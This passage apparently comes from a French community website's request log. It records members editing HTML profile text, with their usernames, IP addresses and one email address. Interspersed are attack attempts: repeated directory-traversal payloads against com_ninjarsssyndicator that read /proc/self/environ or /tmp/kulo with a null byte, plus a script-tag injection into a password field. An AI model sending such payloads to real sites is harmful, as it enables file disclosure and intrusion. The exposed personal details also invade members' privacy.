AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 92.135.162.200 USER: agiron REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-24 11:12:27 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0 IP: 92.162.131.160 USER: solenca REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 3px; float: left;\&quot; src=\&quot;images PAR: cb_presentation2 2013-01-24 11:18:18 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0 IP: 92.162.131.160 USER: solenca REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 3px; float: left;\&quot; src=\&quot;images PAR: cb_presentation2 2013-01-25 11:23:05 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 IP: 109.16.113.157 USER: marion REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;C&lt;/strong&gt; PAR: cb_presentation2 2013-01-25 11:23:43 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 IP: 109.16.113.157 USER: marion REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;&lt;br /&gt;&lt; PAR: cb_presentation2 2013-01-25 11:25:10 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 IP: 109.16.113.157 USER: marion REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;C&lt;/strong&gt; PAR: cb_presentation2 2013-01-29 17:22:50 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 IP: 84.102.215.174 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2013-01-29 18:18:20 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 112.78.183.96 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-01-29 18:18:22 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 112.78.183.96 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-01-31 08:56:25 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 69.64.36.204 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-01-31 08:56:26 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 69.64.36.204 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-02-01 16:14:23 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) IP: 194.3.104.81 USER: gitesdelaboudiniere REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: center;\&quot;&gt;&lt;img style=\&quot;margin: 3p PAR: cb_presentation2 2013-02-01 16:17:16 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) IP: 194.3.104.81 USER: gitesdelaboudiniere REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: center;\&quot;&gt;&lt;img style=\&quot;margin: 3p PAR: cb_presentation2 2013-02-03 18:31:13 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8) IP: 92.132.218.179 USER: prbro0 REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-02-03 18:32:40 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8) IP: 92.132.218.179 USER: prbro0 REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-02-03 18:39:05 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8) IP: 92.132.218.179 USER: prbro0 REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-02-04 08:05:46 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 94.102.11.15 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator&sa=U&ei=eGkPUfK7HOP5iwKn_4DwAQ&ved=0CHwQFjAsOGQ&usg=AFQjCNG-zjb4oQmOIwIyHw4Xojj7NPS7kQ/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//tmp/kulo%0000?clone 2013-02-04 08:05:47 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 94.102.11.15 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator&sa=U&ei=eGkPUfK7HOP5iwKn_4DwAQ&ved=0CHwQFjAsOGQ&usg=AFQjCNG-zjb4oQmOIwIyHw4Xojj7NPS7kQ/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-02-04 08:05:48 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 94.102.11.15 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//tmp/kulo%0000?clone 2013-02-04 08:05:49 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 94.102.11.15 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-02-04 08:05:50 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 94.102.11.15 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//tmp/kulo%0000?clone 2013-02-04 08:05:51 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 94.102.11.15 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-02-05 13:40:00 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 IP: 109.208.45.237 USER: Icd-afrique REQUEST: cb_presentation2=&lt;p&gt;L&acirc;€™Institut de Coop&Atilde;&copy;ration pour le D&Atilde;&copy;v PAR: cb_presentation2 2013-02-05 14:09:39 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 IP: 109.208.45.237 USER: Icd-afrique REQUEST: cb_presentation2=&lt;div style=\&quot;border: 1.5pt solid #ffcc00; padding: 6pt 4pt 19pt;\&quot;& PAR: cb_presentation2 2013-02-14 13:15:26 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 91.121.154.81 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-02-14 13:15:26 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 91.121.154.81 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/comprofiler//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-02-20 01:06:08 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 14.149.46.106 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2013-02-21 13:52:40 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-21 13:56:47 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-21 16:06:38 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-21 16:07:31 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-21 16:08:25 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-21 16:09:02 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-21 20:41:02 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_engagements2=&lt;p&gt;Aborder les missions dans une approche durable, favoriser l\'&Atilde;&co PAR: cb_engagements2 2013-02-21 20:42:48 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-22 10:33:31 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-22 10:33:58 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-22 10:40:57 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 92.133.112.221 USER: muriellebousquet@orange.fr REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.rezotour.com/membres/murielle_bousquet.htm PAR: cb_presentation2 2013-02-22 10:56:13 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 IP: 89.83.55.248 USER: marion REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;C&lt;/strong&gt; PAR: cb_presentation2 2013-02-27 08:15:31 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:19.0) Gecko/20100101 Firefox/19.0 IP: 81.251.11.54 USER: Naturabox REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2013-02-27 08:16:04 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:19.0) Gecko/20100101 Firefox/19.0 IP: 81.251.11.54 USER: Naturabox REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2013-02-27 08:16:53 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:19.0) Gecko/20100101 Firefox/19.0 IP: 81.251.11.54 USER: Naturabox REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2013-02-27 08:20:15 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:19.0) Gecko/20100101 Firefox/19.0 IP: 81.251.11.54 USER: Naturabox REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2013-02-27 08:24:28 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0 IP: 81.251.11.54 USER: Naturabox REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2013-02-27 08:25:15 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0 IP: 81.251.11.54 USER: Naturabox REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2013-02-27 08:25:16 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0 IP: 81.251.11.54 USER: Naturabox REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2013-03-07 18:35:49 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 27.159.252.35 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2013-03-09 08:51:47 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 180.111.140.198 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2013-03-16 05:07:46 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 27.159.237.114 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2013-03-18 14:38:22 USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) IP: 213.87.241.136 USER: visitor REQUEST: passwd=<script> PAR: passwd 2013-03-19 05:21:06 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 95.138.129.84 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-03-19 05:21:07 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 95.138.129.84 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-03-19 05:22:32 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 95.138.129.84 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 2013-03-19 05:22:33 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 95.138.129.84 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000